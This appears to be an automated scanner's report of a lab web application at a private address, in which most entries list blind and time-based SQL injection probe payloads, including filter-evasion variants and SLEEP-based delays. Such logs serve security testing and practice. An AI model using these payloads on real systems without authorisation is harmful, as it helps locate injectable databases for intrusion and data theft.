Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	17276=17276
	and	82004=82004
	or	35424=35424#
	and	6448=6449
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'82716'='82716
'/**/and/**/'32886'='32886
'/**/or/**/61139=61139#
'/**/and/**/'39351'='39352
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	17276=17276
	and	82004=82004
	or	35424=35424#
	and	6448=6449
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	17276=17276
	and	82004=82004
	or	35424=35424#
	and	6448=6449
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
72109=72109

and
97324=97324

or
84136=84136#

and
62998=62999
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'74348'='74348
'+and+'95667'='95667
'+or+67348=67348#
'+and+'37146'='37147
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example122.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example123.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example124.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example125.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example126.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example129.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example128.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example127.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example130.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example131.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example133.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example132.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example134.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example135.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example136.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example138.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example137.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example139.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example141.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example140.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example142.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example143.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example144.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example146.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example145.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example147.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example148.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example150.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example149.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example151.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example152.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example153.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example154.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example155.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example156.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example158.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example157.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example159.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example160.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example161.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example162.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example163.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example164.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example165.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example167.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example166.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example168.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example169.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example170.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example172.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example171.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example173.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example174.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example175.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example177.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example176.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example178.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example179.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example180.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example182.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example181.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example183.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example185.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example184.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example186.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example187.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example188.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example189.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example191.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example190.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'86305'='86305
'	and	'50492'='50492
'	or	66551=66551#
'	and	'73315'='73316
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---